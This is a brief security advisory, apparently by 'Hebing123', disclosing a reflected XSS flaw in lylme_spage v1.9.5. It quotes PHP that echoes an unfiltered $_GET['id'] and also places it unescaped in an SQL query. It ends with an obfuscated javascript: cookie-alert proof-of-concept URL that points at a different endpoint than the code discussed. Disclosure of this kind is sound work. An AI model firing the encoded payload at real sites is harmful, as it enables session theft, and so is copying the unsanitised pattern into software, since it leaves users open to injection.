LyLme_spage v1.9.5 has a Reflected Cross-Site Scripting (XSS) Vulnerability

[Hebing123]

Summary

A reflected XSS vulnerability was discovered in lylme_spage v1.9.5 on the admin/link.php.

Details

lylme_spage/admin/link.php

Lines 71 to 77 in b7c430a

	$id = $_GET['id'];
	$row2 = $DB->query("select * from lylme_links where id='$id' limit 1");
	$row = $DB->fetch($row2);
	preg_match_all('/<font color=[\"|\']+(.*?)[\"|\']>/i', $row['name'], $color);
	echo '<h4>修改链接信息</h4>
	<div class="panel-body">
	<form action="./link.php?set=edit_submit&id=' . $id . '" method="POST">

The vulnerability stems from the lack of filtering or encoding of the $id parameter, allowing an attacker to inject arbitrary HTML and JavaScript code into a link.php page.

The POC demonstrates that by inserting a specially crafted a tag into the URL, an attacker can cause an alert box to appear showing the document's cookies when the link is clicked, evidencing the execution of JavaScript.

POC

http://your-ip/apply/index.php?url=%3Ca%20href%3D%26%23x6a%3B%26%23x61%3B%26%23x76%3B%26%23x61%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3a%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x64%3B%26%23x6f%3B%26%23x63%3B%26%23x75%3B%26%23x6d%3B%26%23x65%3B%26%23x6e%3B%26%23x74%3B%26%23x2e%3B%26%23x63%3B%26%23x6f%3B%26%23x6f%3B%26%23x6b%3B%26%23x69%3B%26%23x65%3B%26%23x29%3B%3Elink